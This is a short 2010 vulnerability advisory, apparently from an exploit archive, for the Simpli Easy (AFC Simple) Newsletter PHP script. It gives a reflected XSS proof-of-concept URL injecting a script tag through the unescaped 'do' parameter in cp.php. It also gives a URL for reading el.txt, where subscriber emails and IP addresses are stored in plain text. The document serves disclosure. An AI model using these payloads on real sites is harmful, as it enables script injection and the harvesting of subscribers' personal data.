Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage
# Published : 2010-10-30
# Author : p0deje
# Previous Title : Pulse Pro 1.4.3 Persistent XSS Vulnerability
# Next Title : AlstraSoft E-Friends 4.96 Multiple Remote Vulnerabilities

Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage

Date: 30.10.2010
Author: p0deje | http://p0deje.blogspot.com
Software Link: http://scubadivingcalculators.com/simpli-easy-newsletter.php
Version: <= 4.2
 
  1. Cross-site Scripting
       
    Vulnerable code:
      cp.php
      ----------------
      6:  <form name="txtlist" action="cp.php?do=<?=$_GET['do']?>"
method="post">
      
    Proof-of-concept:   
      http://www.example.com/cp.php?do="><script>alert(1)</script>
      
  2. Information Leakage
    
    By default, application saves subscribed email addresses and
    correspondent IP addresses to plain text file el.txt
    
    Proof-of-concept:
      http://www.example.com/el.txt